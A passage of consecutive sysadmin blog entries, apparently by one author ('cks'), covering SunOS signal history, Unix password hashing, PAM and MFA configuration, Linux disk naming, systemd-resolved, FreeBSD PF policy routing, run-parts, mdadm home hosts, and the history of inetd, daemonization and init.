The Internet Archives has a variety of historical material from Sun Microsystems, including (some) documentation for both SunOS 2.0 and SunOS 3.0. This documentation makes it clear that the primary purpose of SIGWINCH was to tell graphical programs that their window (or one of them) had been changed, and they should repaint the window or otherwise refresh the contents (a program with multiple windows didn't get any indication of which window was damaged; the programming advice is to repaint them all). The SunOS 2.0 tgetent() termcap function will specifically update what it gives you with the current size of your window, but as far as I can tell there's no other documented support of getting window sizes; it's not mentioned in tty(4) or pty(4). Similar wording appears in the SunOS 3.0 Unix Interface Reference Manual.

(There are PDFs of some SunOS documentation online (eg), and up through SunOS 3.5 I can't find any mention of directly getting the 'window size'. In SunOS 4.0, we finally get a TIOCGWINSZ, documented in termio(4). However, I have access to SunOS 3.5 source, and it does have a TIOCGWINSZ ioctl, although that ioctl isn't documented. It's entirely likely that TIOCGWINSZ was added (well) before SunOS 3.5.)

According to this Git version of the original BSD development history, BSD itself added both SIGWINCH and TIOCGWINSZ at the end of 1984. The early SunOS had SIGWINCH and it may well have had TIOCGWINSZ as well, so it's possible that BSD got both from SunOS. It's also possible that early SunOS had a different (terminal) window size mechanism than TIOCGWINSZ, one more specific to their window system, and the UCB CSRG decided to create a more general mechanism that Sun then copied back by the time of SunOS 3.5 (possibly before the official release of 4.3 BSD, since I suspect everyone in the BSD world was talking to each other at that time).

PS: SunOS also appears to be the source of the mysteriously missing signal 29 in 4.3 BSD (mentioned in my entry on how old various Unix signals are). As described in the SunOS 3.4 sigvec() manual page, signal 29 is 'SIGLOST', "resource lost (see lockd(8C))". This appears to have been added at some point between the initial SunOS 3.0 release and SunOS 3.4, but I don't know exactly when.

Notes on the compatibility of crypted passwords across Unixes in late 2024

By: cks

For years now, all sorts of Unixes have been able to support better password 'encryption' schemes than the basic old crypt(3) salted-mutant-DES approach that Unix started with (these days it's usually called 'password hashing'). However, the support for specific alternate schemes varies from Unix to Unix, and has for many years. Back in 2010 I wrote some notes on the situation at the time; today I want to look at the situation again, since password hashing is on my mind right now.

The most useful resource for cross-Unix password hash compatibility is Wikipedia's comparison table. For Linux, support varies by distribution based on their choice of C library and what version of libxcrypt they use, and you can usually see a list in crypt(5), and pam_unix may not support using all of them for new passwords. For FreeBSD, their support is documented in crypt(3). In OpenBSD, this is documented in crypt(3) and crypt_newhash(3), although there isn't much to read since current OpenBSD only lists support for 'Blowfish', which for password hashing is also known as bcrypt. On Illumos, things are more or less documented in crypt(3), crypt.conf(5), and crypt_unix(7) and associated manual pages; the Illumos section 7 index provides one way to see what seems to be supported.

System administrators not infrequently wind up wanting cross-Unix compatibility of their local encrypted passwords. If you don't care about your shared passwords working on OpenBSD (or NetBSD), then the 'sha512' scheme is your best bet; it basically works everywhere these days. If you do need to include OpenBSD or NetBSD, you're stuck with bcrypt, but even then there may be problems because bcrypt is actually several schemes, as Wikipedia covers.
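
If you need to generate such hashes by hand (for example, to push into /etc/shadow or an LDAP attribute), one broadly available option is OpenSSL's passwd subcommand, which supports sha512 via '-6' in OpenSSL 1.1.1 and later:

openssl passwd -6

This prompts for a password and prints a '$6$...' sha512 hash. OpenSSL won't do bcrypt for you; for that you need another tool, such as mkpasswd from Debian and Ubuntu's whois package (assuming your version of it knows the method, 'mkpasswd -m bcrypt').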

Some recent Linux distributions seem to be switching to 'yescrypt' by default (including Debian, which means downstream distributions like Ubuntu have also switched). Yescrypt in Ubuntu is now old enough that it's probably safe to use in an all-Ubuntu environment, although your mileage may vary if you have 18.04 or earlier systems. Yescrypt is not yet available in FreeBSD and may never be added to OpenBSD or NetBSD (my impression is that OpenBSD is not a fan of having lots of different password hashing algorithms and prefers to focus on one that they consider secure).

(Compared to my old entry, I no longer particularly care about the non-free Unixes, including macOS. Even Wikipedia doesn't bother trying to cover AIX. For our local situation, we may someday want to share passwords to FreeBSD machines, but we're very unlikely to care about sharing passwords to OpenBSD machines since we currently only use them in situations where having their own stand-alone passwords is a feature, not a bug.)

Pam_unix and your system's supported password algorithms

By: cks

The Linux login passwords that wind up in /etc/shadow can be encrypted (well, hashed) with a variety of algorithms, which you can find listed (and sort of documented) in places like Debian's crypt(5) manual page. Generally the choice of which algorithm is used to hash (new) passwords (for example, when people change them) is determined by an option to the pam_unix PAM module.

You might innocently think, as I did, that all of the algorithms your system supports will all be supported by pam_unix, or more exactly will all be available for new passwords (ie, what you or your distribution control with an option to pam_unix). It turns out that this is not the case some of the time (or if it is actually the case, the pam_unix manual page can be inaccurate). This is surprising because pam_unix is the thing that handles hashed passwords (both validating them and changing them), and you'd think its handling of them would be symmetric.

As I found out today, this isn't necessarily so. As documented in the Ubuntu 20.04 crypt(5) manual page, 20.04 supports yescrypt in crypt(3) (sadly Ubuntu's manual page URL doesn't seem to work). This means that the Ubuntu 20.04 pam_unix can (or should) be able to accept yescrypt hashed passwords. However, the Ubuntu 20.04 pam_unix(8) manual page doesn't list yescrypt as one of the available options for hashing new passwords. If you look only at the 20.04 pam_unix manual page, you might (incorrectly) assume that a 20.04 system can't deal with yescrypt based passwords at all.

At one level, this makes sense once you know that pam_unix and crypt(3) come from different packages and handle different parts of the work of checking existing Unix password and hashing new ones. Roughly speaking, pam_unix can delegate checking passwords to crypt(3) without having to care how they're hashed, but to hash a new password with a specific algorithm it has to know about the algorithm, have a specific PAM option added for it, and call some functions in the right way. It's quite possible for crypt(3) to get ahead of pam_unix for a new password hashing algorithm, like yescrypt.
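
To make this concrete, the algorithm for new passwords is selected by an option at the end of the pam_unix password line, along the lines of this sketch (the other options shown are common Debian/Ubuntu ones, not requirements):

password  required  pam_unix.so  obscure use_authtok try_first_pass sha512

You would swap sha512 for yescrypt only once you know the pam_unix on all of the relevant systems accepts it.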

(Since they're separate packages, pam_unix may not want to implement this for a new algorithm until a crypt(3) that supports it is at least released, and then pam_unix itself will need a new release. And I don't know if linux-pam can detect whether or not yescrypt is supported by crypt(3) at build time (or at runtime).)

PS: If you have an environment with a shared set of accounts and passwords (whether via LDAP or your own custom mechanism) and a mixture of Ubuntu versions (maybe also with other Linux distribution versions), you may want to be careful about using new password hashing schemes, even once it's supported by pam_unix on your main systems. The older some of your Linuxes are, the more you'll want to check their crypt(3) and crypt(5) manual pages carefully.

Linux's /dev/disk/by-id unfortunately often puts the transport in the name

By: cks

Filippo Valsorda ran into an issue that involved, in part, the naming of USB disk drives. To quote the relevant bit:

I can't quite get my head around the zfs import/export concept.

When I replace a drive I like to first resilver the new one as a USB drive, then swap it in. This changes the device name (even using by-id).

[...]

My first reaction was that something funny must be going on. My second reaction was to look at an actual /dev/disk/by-id with a USB disk, at which point I got a sinking feeling that I should have already recognized from a long time ago. If you look at your /dev/disk/by-id, you will mostly see names that start with things like 'ata-', 'scsi-OATA-', 'scsi-1ATA', and maybe 'usb-' (and perhaps 'nvme-', but that's a somewhat different kettle of fish). All of these names have the problem that they burn the transport (how you talk to the disk) into the /dev/disk/by-id, which is supposed to be a stable identifier for the disk as a standalone thing.

As Filippo Valsorda's case demonstrates, the problem is that some disks can move between transports. When this happens, the theoretically stable name of the disk changes; what was 'usb-' is now likely 'ata-' or vice versa, and in some cases other transformations may happen. Your attempt to use a stable name has failed and you will likely have problems.

Experimentally, there seem to be some /dev/disk/by-id names that are more stable. Some but not all of our disks have 'wwn-' names (one USB attached disk I can look at doesn't). Our Ubuntu based systems have 'scsi-<hex digits>' and 'scsi-SATA-<disk id>' names, but one of my Fedora systems with SATA drives has only the 'scsi-<hex>' names and the other one has neither. One system we have a USB disk on has no names for the disk other than 'usb-' ones. It seems clear that it's challenging at best to give general advice about how a random Linux user should pick truly stable /dev/disk/by-id names, especially if you have USB drives in the picture.
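
To see what names your own disks have, just list the directory (the output here is illustrative; the model and serial numbers are made up):

ls -l /dev/disk/by-id/
# ata-ST4000DM004_ZFN0ABCD -> ../../sda
# wwn-0x5000c500a1b2c3d4 -> ../../sda
# usb-Seagate_Expansion_ABCD1234-0:0 -> ../../sdb

A disk with both an 'ata-' and a 'wwn-' name shows the issue in miniature: the former changes if the disk moves to USB, while the latter should survive the move (if the disk gets a 'wwn-' name at all).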

(See also Persistent block device naming in the Arch Wiki.)

This whole current situation seems less than ideal, to put it one way. It would be nice if disks (and partitions on them) had names that were as transport independent and usable as possible, especially since most disks have theoretically unique serial numbers and model names available (and if you're worried about cross-transport duplicates, you should already be at least as worried about duplicates within the same type of transport).

PS: You can find out what information udev knows about your disks with 'udevadm info --query=all --name=/dev/...' (from, via, by coincidence). The information for a SATA disk differs between my two Fedora machines (one of them has various SCSI_* and ID_SCSI* stuff and the other doesn't), but I can't see any obvious reason for this.

Using pam_access to sometimes not use another PAM module

By: cks

Suppose that you want to authenticate SSH logins to your Linux systems using some form of multi-factor authentication (MFA). The normal way to do this is to use 'password' authentication and then in the PAM stack for sshd, use both the regular PAM authentication module(s) of your system and an additional PAM module that requires your MFA (in another entry about this I used the module name pam_mfa). However, in your particular MFA environment it's been decided that you don't have to require MFA for logins from some of your other networks or systems, and you'd like to implement this.

Because your MFA happens through PAM and the details of this are opaque to OpenSSH's sshd, you can't directly implement skipping MFA through sshd configuration settings. If sshd winds up doing password based authentication at all, it will run your full PAM stack and that will challenge people for MFA. So you must implement sometimes skipping your MFA module in PAM itself. Fortunately there is a PAM module we can use for this, pam_access.

The usual way to use pam_access is to restrict or allow logins (possibly only some logins) based on things like the source address people are trying to log in from (in this, it's sort of a superset of the old tcpwrappers). How this works is configured through an access control file. We can (ab)use this basic matching in combination with the more advanced form of PAM controls to skip our PAM MFA module if pam_access matches something.

What we want looks like this:

auth  [success=1 default=ignore]  pam_access.so noaudit accessfile=/etc/security/access-nomfa.conf
auth  requisite  pam_mfa

Pam_access itself will 'succeed' as a PAM module if the result of processing our access-nomfa.conf file is positive. When this happens, we skip the next PAM module, which is our MFA module. If it 'fails', we ignore the result; the 'noaudit' option also tells pam_access not to log these failures.

Our access-nomfa.conf file will have things like:

# Everyone skips MFA for internal networks
+:ALL:192.168.0.0/16 127.0.0.1

# Insure we fail otherwise.
-:ALL:ALL

We list the networks we want to allow password logins without MFA from, and then we have to force everything else to fail. (If you leave this off, everything passes, either explicitly or implicitly.)

As covered in the access.conf manual page, you can get quite sophisticated here. For example, you could have people who always had to use MFA, even from internal machines. If they were all in a group called 'mustmfa', you might start with:

-:(mustmfa):ALL
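
Putting the pieces together, the whole file might look like the following sketch (networks made up, as before); pam_access uses the first matching rule, so order matters:

# People in 'mustmfa' always get challenged:
-:(mustmfa):ALL

# Everyone else skips MFA from internal networks:
+:ALL:192.168.0.0/16 127.0.0.1

# Insure we fail otherwise.
-:ALL:ALL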

If you get at all creative with your access-nomfa.conf, I strongly suggest writing a lot of comments to explain everything. Your future self will thank you.

Unfortunately but entirely reasonably, the information about the remote source of a login session doesn't pass through to later PAM authentication done by sudo and su commands that you do in the session. This means that you can't use pam_access to not give MFA challenges on su or sudo to people who are logged in from 'trusted' areas.

(As far as I can tell, the only information pam_access gets about the 'origin' of a su is the TTY, which is generally not going to be useful. You can probably use this to not require MFA on su or sudo that are directly done from logins on the machine's physical console or serial console.)

Having an emergency backup DNS resolver with systemd-resolved

By: cks

At work we have a number of internal DNS resolvers, which you very much want to use to resolve DNS names if you're inside our networks for various reasons (including our split-horizon DNS setup). Purely internal DNS names aren't resolvable by the outside world at all, and some DNS names resolve differently. However, at the same time a lot of the host names that are very important to me are in our public DNS because they have public IPs (sort of for historical reasons), and so they can be properly resolved if you're using external DNS servers. This leaves me with a little bit of a paradox; on the one hand, my machines must resolve our DNS zones using our internal DNS servers, but on the other hand if our internal DNS servers aren't working for some reason (or my home machine can't reach them) it's very useful to still be able to resolve the DNS names of our servers, so I don't have to memorize their IP addresses.

A while back I switched to using systemd-resolved on my machines. Systemd-resolved has a number of interesting virtues, including that it has fast (and centralized) failover from one upstream DNS resolver to another. My systemd-resolved configuration is probably a bit unusual, in that I have a local resolver on my machines, so resolved's global DNS resolution goes to it and then I add a layer of (nominally) interface-specific DNS domain overrides that point to our internal DNS resolvers.

(This doesn't give me perfect DNS resolution, but it's more resilient and under my control than routing everything to our internal DNS resolvers, especially for my home machine.)

Somewhat recently, it occurred to me that I could deal with the problem of our internal DNS resolvers all being unavailable by adding '127.0.0.1' as an additional potential DNS server for my interface specific list of our domains. Obviously I put it at the end, where resolved won't normally use it. But with it there, if all of the other DNS servers are unavailable I can still try to resolve our public DNS names with my local DNS resolver, which will go out to the Internet to talk to various authoritative DNS servers for our zones.
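
A sketch of what this looks like with resolvectl (the interface name and resolver IPs are made up):

resolvectl dns ens3 10.1.0.53 10.2.0.53 127.0.0.1
resolvectl domain ens3 '~example.org'

Re-running the first command without the trailing 127.0.0.1 is also a convenient way to drop the emergency backup again later.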

The drawback with this emergency backup approach is that systemd-resolved will stick with whatever DNS server it's currently using unless that DNS server stops responding. So if resolved switches to 127.0.0.1 for our zones, it's going to keep using it even after the other DNS resolvers become available again. I'll have to notice that and manually fiddle with the interface specific DNS server list to remove 127.0.0.1, which would force resolved to switch to some other server.

(As far as I can tell, the current systemd-resolved correctly handles the situation where an interface says that '127.0.0.1' is the DNS resolver for it, and doesn't try to force queries to 127.0.0.1:53 to go out that interface. My early 2013 notes say that this sometimes didn't work, but I failed to write down the specific circumstances.)

Doing basic policy based routing on FreeBSD with PF rules

By: cks

Suppose, not hypothetically, that you have a FreeBSD machine that has two interfaces and these two interfaces are reached through different firewalls. You would like to ping both of the interfaces from your monitoring server because both of them matter for the machine's proper operation, but to make this work you need replies to your pings to be routed out the right interface on the FreeBSD machine. This is broadly known as policy based routing and is often complicated to set up. Fortunately FreeBSD's version of PF supports a basic version of this, although it's not well explained in the FreeBSD pf.conf manual page.

To make our FreeBSD machine reply properly to our monitoring machine's ICMP pings, or in general to its traffic, we need a stateful 'pass' rule with a 'reply-to':

B_IF="emX"
B_IP="10.x.x.x"
B_GW="10.x.x.254"
B_SUBNET="10.x.x.0/24"

pass in quick on $B_IF \
  reply-to ($B_IF $B_GW) \
  inet from ! $B_SUBNET to $B_IP \
  keep state

(Here $B_IP is the machine's IP on this second interface, and we also need the second interface, the gateway for the second interface's subnet, and the subnet itself.)

As I discovered, you must put the 'reply-to' where it is here, although as far as I can tell the FreeBSD pf.conf manual page will only tell you that if you read the full BNF. If you put it at the end the way you might read the text description, you will get only opaque syntax errors.

We must specifically exclude traffic from the subnet itself to us, because otherwise this rule will faithfully send replies to other machines on the same subnet off to the gateway, which either won't work well or won't work at all. You can restrict the PF rule more narrowly, for example 'from { IP1 IP2 IP3 }' if those are the only off-subnet IPs that are supposed to be talking to your secondary interface.

(You may also want to match only some ports here, unless you want to give all incoming traffic on that interface the ability to talk to everything on the machine. This may require several versions of this rule, basically sticking the 'reply-to ...' bit into every 'pass in quick on ...' rule you have for that interface.)
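
For instance, a sketch that applies the reply-to treatment only to inbound SSH (everything else on the interface would need its own rule):

pass in quick on $B_IF \
  reply-to ($B_IF $B_GW) \
  inet proto tcp from ! $B_SUBNET to $B_IP port 22 \
  keep state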

This PF rule only handles incoming connections (including implicit ones from ICMP and UDP traffic). If we want to be able to route our outgoing traffic over our secondary interface by selecting a source address, we need a second PF rule:

pass out quick \
  route-to ($B_IF $B_GW) \
  inet from $B_IP to ! $B_SUBNET \
  keep state

Again we must specifically exclude traffic to our local network, because otherwise it will go flying off to our gateway, and also you can be more specific if you only want this machine to be able to connect to certain things using this gateway and firewall (eg 'to { IP1 IP2 SUBNET3/24 }', or you could use a port-based restriction).

(The PF rule can't be qualified with 'on $B_IF', because the situation where you need this rule is where the packet would not normally be going out that interface. Using 'on <the interface with your default route's gateway>' has some subtle differences in the semantics if you have more than two interfaces.)

Although you might innocently think otherwise, the second rule by itself isn't sufficient to make incoming connections to the second interface work correctly. If you want both incoming and outgoing connections to work, you need both rules. Possibly it would work if you matched incoming traffic on $B_IF without keeping state.

A surprise with /etc/cron.daily, run-parts, and files with '.' in their name

By: cks

Linux distributions have a long standing general cron feature where there are /etc/cron.hourly, /etc/cron.daily, and /etc/cron.weekly directories and if you put scripts in there, they will get run hourly, daily, or weekly (at some time set by the distribution). The actual running is generally implemented by a program called 'run-parts'. Since this is a standard Linux distribution feature, of course there is a single implementation of run-parts and its behavior is standardized, right?

Since I'm asking the question, you already know the answer: there are at least two different implementations of run-parts, and their behavior differs in at least one significant way (as well as several other probably less important ones).

In Debian, Ubuntu, and other Debian-derived distributions (and also I think Arch Linux), run-parts is a C program that is part of debianutils. In Fedora, Red Hat Enterprise Linux, and derived RPM-based distributions, run-parts is a shell script that's part of the crontabs package, which is part of cronie-cron. One somewhat unimportant way that these two versions differ is that the RPM version ignores some extensions that come from RPM packaging fun (you can see the current full list in the shell script code), while the Debian version only skips the Debian equivalents with a non-default option (and actually documents the behavior in the manual page).

A much more important difference is that the Debian version ignores files with a '.' in their name (this can be changed with a command line switch, but /etc/cron.daily and so on are not processed with this switch). As a non-hypothetical example, if you have a /etc/cron.daily/backup.sh script, a Debian based system will ignore this while a RHEL or Fedora based system will happily run it. If you are migrating a server from RHEL to Ubuntu, this may come as an unpleasant surprise, partly since the Debian version doesn't complain about skipping files.
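
On a Debian-family system you can ask run-parts what it would actually execute, and renaming the script is the simple fix; a sketch:

# show which files run-parts would run:
run-parts --test /etc/cron.daily
# drop the '.' so the script becomes eligible again:
mv /etc/cron.daily/backup.sh /etc/cron.daily/backup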

(Whether or not the restriction could be said to be clearly documented in the Debian manual page is a matter of taste. Debian does clearly state the allowed characters, but it does not point out that '.', a not uncommon character, is explicitly not accepted by default.)

Linux software RAID and changing your system's hostname

By: cks

Today, I changed the hostname of an old Linux system (for reasons) and rebooted it. To my surprise, the system did not come up afterward, but instead got stuck in systemd's emergency mode for a chain of reasons that boiled down to there being no '/dev/md0'. Changing the hostname back to its old value and rebooting the system again caused it to come up fine. After some diagnostic work, I believe I understand what happened and how to work around it if it affects us in the future.

One of the issues that Linux RAID auto-assembly faces is the question of what it should call the assembled array. People want their RAID array names to stay fixed (so /dev/md0 is always /dev/md0), and so the name is part of the RAID array's metadata, but at the same time you have the problem of what happens if you connect up two sets of disks that both want to be 'md0'. Part of the answer is mdadm.conf, which can give arrays names based on their UUID. If your mdadm.conf says 'ARRAY /dev/md10 ... UUID=<x>' and mdadm finds a matching array, then in theory it can be confident you want that one to be /dev/md10 and it should rename anything else that claims to be /dev/md10.

However, suppose that your array is not specified in mdadm.conf. In that case, another software RAID array feature kicks in, which is that arrays can have a 'home host'. If the array is on its home host, it will get the name it claims it has, such as '/dev/md0'. Otherwise, well, let me quote from the 'Auto-Assembly' section of the mdadm manual page:

[...] Arrays which do not obviously belong to this host are given names that are expected not to conflict with anything local, and are started "read-auto" so that nothing is written to any device until the array is written to. i.e. automatic resync etc is delayed.

As is covered in the documentation for the '--homehost' option in the mdadm manual page, on modern 1.x superblock formats the home host is embedded into the name of the RAID array. You can see this with 'mdadm --detail', which can report things like:

Name : ubuntu-server:0
Name : <host>:25  (local to host <host>)

Both of these have a 'home host'; in the first case the home host is 'ubuntu-server', and in the second case the home host is the current machine's hostname. Well, its 'hostname' as far as mdadm is concerned, which can be set in part through mdadm.conf's 'HOMEHOST' directive. Let me repeat that: mdadm by default identifies home hosts by their hostname, not by any more stable identifier.

So if you change a machine's hostname and you have arrays not in your mdadm.conf with home hosts, their /dev/mdN device names will get changed when you reboot. This is what happened to me, as we hadn't added the array to the machine's mdadm.conf.
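
The obvious precaution is to pin such arrays by UUID in mdadm.conf. One way to do this, as a sketch (on Ubuntu the file is /etc/mdadm/mdadm.conf; on other distributions it may be /etc/mdadm.conf):

# append ARRAY lines for the live arrays, then edit to taste:
mdadm --detail --scan >> /etc/mdadm/mdadm.conf
# on Ubuntu, rebuild the initramfs so early boot sees the updated file:
update-initramfs -u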

(Contrary to some ways to read the mdadm manual page, arrays are not renamed if they're in mdadm.conf. Otherwise we'd have noticed this a long time ago on our Ubuntu servers, where all of the arrays created in the installer have the home host of 'ubuntu-server', which is obviously not any machine's actual hostname.)

Setting the home host value to the machine's current hostname when an array is created is the mdadm default behavior, although you can turn this off with the right mdadm.conf HOMEHOST setting. You can also tell mdadm to consider all arrays to be on their home host, regardless of the home host embedded into their names.

(The latter is 'HOMEHOST <ignore>', the former by itself is 'HOMEHOST <none>', and it's currently valid to combine them both as 'HOMEHOST <ignore> <none>', although this isn't quite documented in the manual page.)

PS: Some uses of software RAID arrays won't care about their names. For example, if they're used for filesystems, and your /etc/fstab specifies the device of the filesystem using 'UUID=' or with '/dev/disk/by-id/md-uuid-...' (which seems to be common on Ubuntu).

PPS: For 1.x superblocks, the array name as a whole can only be 32 characters long, which obviously limits how long of a home host name you can have, especially since you need a ':' in there as well and an array number or the like. If you create a RAID array on a system with a too long hostname, the name of the resulting array will not be in the '<host>:<name>' format that creates an array with a home host; instead, mdadm will set the name of the RAID to the base name (either whatever name you specified, or the N of the 'mdN' device you told it to use).

(It turns out that I managed to do this by accident on my home desktop, which has a long fully qualified name, by creating an array with the name 'ssd root'. The combination turns out to be 33 characters long, so the RAID array just got the name 'ssd root' instead of '<host>:ssd root'.)

The history of inetd is more interesting than I expected

By: cks

Inetd is a traditional Unix 'super-server' that listens on multiple (IP) ports and runs programs in response to activity on them. When inetd listens on a port, it can act in two different modes. In the simplest mode, it starts a separate copy of the configured program for every connection (much like the traditional HTTP CGI model), which is an easy way to implement small, low volume services but usually not good for bigger, higher volume ones. The second mode is more like modern 'socket activation'; when a connection comes in, inetd starts your program and passes it the master socket, leaving it to you to keep accepting and processing connections until you exit.

(In inetd terminology, the first mode is 'nowait' and the second is 'wait'; this describes whether inetd immediately resumes listening on the socket for connections or waits until the program exits.)
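
In inetd.conf syntax, the mode is one field of a service's line; a sketch with illustrative paths:

# 'nowait': inetd accepts each connection and starts a fresh ftpd for it
ftp    stream  tcp  nowait  root  /usr/libexec/ftpd    ftpd
# 'wait': inetd hands the daemon the listening socket and waits for it to exit
ntalk  dgram   udp  wait    root  /usr/libexec/ntalkd  ntalkd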

Inetd turns out to have a more interesting history than I expected, and it's a history that's entwined with daemonization, especially with how the BSD r* commands daemonize themselves in 4.2 BSD. If you'd asked me before I started writing this entry, I'd have said that inetd was present in 4.2 BSD and was being used for various low-importance services. This turns out to be false in both respects. As far as I can tell, inetd was introduced in 4.3 BSD, and when it was introduced it was immediately put to use for important system daemons like rlogind, telnetd, ftpd, and so on, which were surprisingly run in the first style (with a copy of the relevant program started for each connection). You can see this in the 4.3 BSD /etc/inetd.conf, which has the various TCP daemons and lists them as 'nowait'.

(There are still network programs that are run as stand-alone daemons, per the 4.3 BSD /etc/rc and the 4.3 BSD /etc/rc.local. If we don't count syslogd, the standard 4.3 BSD tally seems to be rwhod, lpd, named, and sendmail.)

While I described inetd as having two modes and this is the modern state, the 4.3 BSD inetd(8) manual page says that only the 'start a copy of the program every time' mode ('nowait') is to be used for TCP programs like rlogind. I took a quick read over the 4.3 BSD inetd.c and it doesn't seem to outright reject a TCP service set up with 'wait', and the code looks like it might actually work with that. However, there's the warning in the manual page and there's no inetd.conf entry for a TCP service that is 'wait', so you'd be on your own.

The corollary of this is that in 4.3 BSD, programs like rlogind don't have the daemonization code that they did in 4.2 BSD. Instead, the 4.3 BSD rlogind.c shows that it can only be run under inetd or some equivalent, as rlogind immediately aborts if its standard input isn't a socket (and it expects the socket to be connected to some other end, which is true for the 'nowait' inetd mode but not how things would be for the 'wait' mode).

This 4.3 BSD inetd model seems to have rapidly propagated into BSD-derived systems like SunOS and Ultrix. I found traces that relatively early on, both of them had inherited the 4.3 style non-daemonizing rlogind and associated programs, along with an inetd-based setup for them. This is especially interesting for SunOS, because it was initially derived from 4.2 BSD (I'm less sure of Ultrix's origins, although I suspect it too started out as 4.2 BSD derived).

PS: I haven't looked to see if the various BSDs ever changed this mode of operation for rlogind et al, or if they carried the 'per connection' inetd based model all through until each of them removed the r* commands entirely.

OpenBSD kernel messages about memory conflicts on x86 machines

By: cks

Suppose you boot up an OpenBSD machine that you think may be having problems, and as part of this boot you look at the kernel messages for the first time in a while (or perhaps ever), and when doing so you see messages that look like this:

3:0:0: rom address conflict 0xfffc0000/0x40000
3:0:1: rom address conflict 0xfffc0000/0x40000

Or maybe the messages are like this:

memory map conflict 0xe00fd000/0x1000
memory map conflict 0xfe000000/0x11000
[...]
3:0:0: mem address conflict 0xfffc0000/0x40000
3:0:1: mem address conflict 0xfffc0000/0x40000

This sounds alarming, but there's almost certainly no actual problem, and if you check logs you'll likely find that you've been getting messages like this for as long as you've had OpenBSD on the machine.

The short version is that both of these are reports from OpenBSD that it's finding conflicts in the memory map information it is getting from your BIOS. The messages that start with 'X:Y:Z' are about PCI(e) device memory specifically, while the 'memory map conflict' errors are about the general memory map the BIOS hands the system.

Generally, OpenBSD will report additional information immediately after about what the PCI(e) devices in question are. Here are the full kernel messages around the 'rom address conflict':

pci3 at ppb2 bus 3
3:0:0: rom address conflict 0xfffc0000/0x40000
3:0:1: rom address conflict 0xfffc0000/0x40000
bge0 at pci3 dev 0 function 0 "Broadcom BCM5720" rev 0x00, BCM5720 A0 (0x5720000), APE firmware NCSI 1.4.14.0: msi, address 50:9a:4c:xx:xx:xx
brgphy0 at bge0 phy 1: BCM5720C 10/100/1000baseT PHY, rev. 0
bge1 at pci3 dev 0 function 1 "Broadcom BCM5720" rev 0x00, BCM5720 A0 (0x5720000), APE firmware NCSI 1.4.14.0: msi, address 50:9a:4c:xx:xx:xx
brgphy1 at bge1 phy 2: BCM5720C 10/100/1000baseT PHY, rev. 0

Here these are two network ports on the same PCIe device (more or less), so it's not terribly surprising that the same ROM is maybe being reused for both. I believe the two messages mean that both ROMs (at the same address) are conflicting with another unmentioned allocation. I'm not sure how you find out what the original allocation and device is that they're both conflicting with.

The PCI related messages come from sys/dev/pci/pci.c and in current OpenBSD come in a number of variations, depending on what sort of PCI address space is detected as in conflict in pci_reserve_resources(). Right now, I see 'mem address conflict', 'io address conflict', the already mentioned 'rom address conflict', 'bridge io address conflict', 'bridge mem address conflict' (in several spots in the code), and 'bridge bus conflict'. Interested parties can read the source for more because this exhausts my knowledge on the subject.

The 'memory map conflict' message comes from a different place; for most people it will come from sys/arch/amd64/pci/pci_machdep.c, in pci_init_extents(). If I'm understanding the code correctly, this is creating an initial set of reserved physical address space that PCI devices should not be using. It registers each piece of bios_memmap, which according to comments in sys/arch/amd64/amd64/machdep.c is "the memory map as the bios has returned it to us". I believe that a memory map conflict at this point says that two pieces of the BIOS memory map overlap each other (or one is entirely contained in the other).

I'm not sure it's correct to describe these messages as harmless. However, it's likely that they've been there for as long as your system's BIOS has been setting up its general memory map and the PCI devices as it has been, and you'd likely see the same address conflicts with another system (although Linux doesn't seem to complain about it; I don't know about FreeBSD).

Daemonization in Unix programs is probably about restarting programs

By: cks

It's standard for Unix daemon programs to 'daemonize' themselves when they start, completely detaching from how they were run; this behavior is quite old and these days it's somewhat controversial and sometimes considered undesirable. At this point you might ask why programs even daemonize themselves in the first place, and while I don't know for sure, I do have an opinion. My belief is that daemonization is because of restarting daemon programs, not starting them at boot.

During system boot, programs don't need to daemonize in order to start properly. The general Unix boot time environment has long been able to detach programs into the background (although the V7 /etc/rc didn't bother to do this with /etc/update and /etc/cron, the 4.2BSD /etc/rc did do this for the new BSD network daemons). In general, programs started at boot time don't need to worry that they will be inheriting things like stray file descriptors or a controlling terminal. It's the job of the overall boot time environment to insure that they start in a clean environment, and if there's a problem there you should fix it centrally, not make it every program's job to deal with the failure of your init and boot sequence.

However, init is not a service manager (not historically), which meant that for a long time, starting or restarting daemons after boot was entirely in your hands with no assistance from the system. Even if you remembered to restart a program as 'daemon &' so that it was backgrounded, the newly started program could inherit all sorts of things from your login session. It might have some random current directory, it might have stray file descriptors that were inherited from your shell or login environment, its standard input, output, and error would be connected to your terminal, and it would have a controlling terminal, leaving it exposed to various bad things happening to it when, for example, you logged out (which often would deliver a SIGHUP to it).

This is the sort of thing that even very old daemonization code deals with, which is to say that it fixes. The 4.2BSD daemonization code closes (stray) file descriptors and removes any controlling terminal the process may have, in addition to detaching itself from your shell (in case you forgot or didn't use the '&' when starting it). It's also easy to see how people writing Unix daemons might drift into adding this sort of code to them as people restarted the daemons (by hand) and ran into the various problems (cf). In fact the 4.2BSD code for it is conditional on 'DEBUG' not being defined; presumably if you were debugging, say, rlogind, you'd build a version that didn't detach itself on you so you could easily run it under a debugger or whatever.

It's a bit of a pity that 4.2 BSD and its successors didn't create a general 'daemonize' program that did all of this for you and then tell people to restart daemons with 'daemonize <program>' instead of '<program>'. But we got the Unix that we have, not the Unix that we'd like to have, and Unixes did eventually grow various forms of service management that tried to encapsulate all of the things required to restart daemons in one place.

(Even then, I'm not sure that old System V init systems would properly daemonize something that you restarted through '/etc/init.d/<whatever> restart', or if it was up to the program to do things like close extra file descriptors and get rid of any controlling terminal.)

PS: Much later, people did write tools for this, such as daemonize. It's surprisingly handy to have such a program lying around for when you want or need it.

Traditionally, init on Unix was not a service manager as such

By: cks

Init (the process) has historically had a number of roles but, perhaps surprisingly, being a 'service manager' (or a 'daemon manager') was not one of them in traditional init systems. In V7 Unix and continuing on into traditional 4.x BSD, init (sort of) started various daemons by running /etc/rc, but its only 'supervision' was of getty processes for the console and (other) serial lines. There was no supervision or management of daemons or services, even in the overall init system (stretching beyond PID 1, init itself). To restart a service, you killed its process and then re-ran it somehow; getting even the command line arguments right was up to you.

(It's conventional to say that init started daemons during boot, even though technically there are some intermediate processes involved since /etc/rc is a shell script.)

The System V init had a more general /etc/inittab that could in theory handle more than getty processes, but in practice it wasn't used for managing anything more than them. The System V init system as a whole did have a concept of managing daemons and services, in the form of its multi-file /etc/rc.d structure, but stopping and restarting services was handled outside of the PID 1 init itself. To stop a service you directly ran its init.d script with 'whatever stop', and the script used various approaches to find the processes and get them to stop. Similarly, (re)starting a daemon was done directly by its init.d script, without PID 1 being involved.

